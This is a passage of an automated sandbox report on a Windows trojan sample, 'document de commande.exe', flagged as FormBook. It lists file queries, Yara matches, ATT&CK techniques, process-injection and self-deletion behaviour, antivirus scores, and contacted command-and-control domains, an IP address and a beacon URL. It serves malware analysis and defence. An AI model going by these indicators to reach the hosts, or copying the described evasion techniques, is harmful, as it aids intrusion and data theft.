          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 502021 Sample: document de commande.scr Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 8 other signatures 2->43 10 document de commande.exe 3 2->10         started        process3 file4 27 C:\Users\...\document de commande.exe.log, ASCII 10->27 dropped 13 document de commande.exe 10->13         started        process5 signatures6 53 Modifies the context of a thread in another process (thread injection) 13->53 55 Maps a DLL or memory area into another process 13->55 57 Sample uses process hollowing technique 13->57 59 Queues an APC in another process (thread injection) 13->59 16 explorer.exe 13->16 injected process7 dnsIp8 29 www.casaruralesgranada.com 217.160.0.186, 49853, 80 ONEANDONE-ASBrauerstrasse48DE Germany 16->29 31 www.gaiaseyephotography.com 16->31 33 www.ecshopdemo.com 16->33 35 System process connects to network (likely due to code injection or exploit) 16->35 20 chkdsk.exe 16->20         started        signatures9 process10 signatures11 45 Self deletion via cmd delete 20->45 47 Modifies the context of a thread in another process (thread injection) 20->47 49 Maps a DLL or memory area into another process 20->49 51 Tries to detect virtualization through RDTSC time measurements 20->51 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          document de commande.exe31%VirustotalBrowse
          document de commande.exe23%MetadefenderBrowse
          document de commande.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.document de commande.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.casaruralesgranada.com/dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          www.yourherogarden.net/dn7r/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.casaruralesgranada.com
          		217.160.0.186
          		truetrue
            		unknown
            www.ecshopdemo.com
            		unknown
            		unknowntrue
              		unknown
              www.gaiaseyephotography.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.casaruralesgranada.com/dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtctrue
                • Avira URL Cloud: safe
                		unknown
                www.yourherogarden.net/dn7r/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bThedocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.collada.org/2005/11/COLLADASchema9Donedocument de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comldocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cThedocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cndocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-user.htmldocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleasedocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fonts.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleasedocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cndocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sakkal.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    217.160.0.186
                                    		www.casaruralesgranada.comGermany
                                    		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:502021
                                    Start date:13.10.2021
                                    Start time:14:26:13
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 26s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:document de commande.scr (renamed file extension from scr to exe)
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/1@3/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 15.2% (good quality ratio 14%)
                                    • Quality average: 75.5%
                                    • Quality standard deviation: 29.9%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 52
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.82.210.154, 8.247.248.249, 8.247.248.223, 8.247.244.249, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33, 20.82.209.183
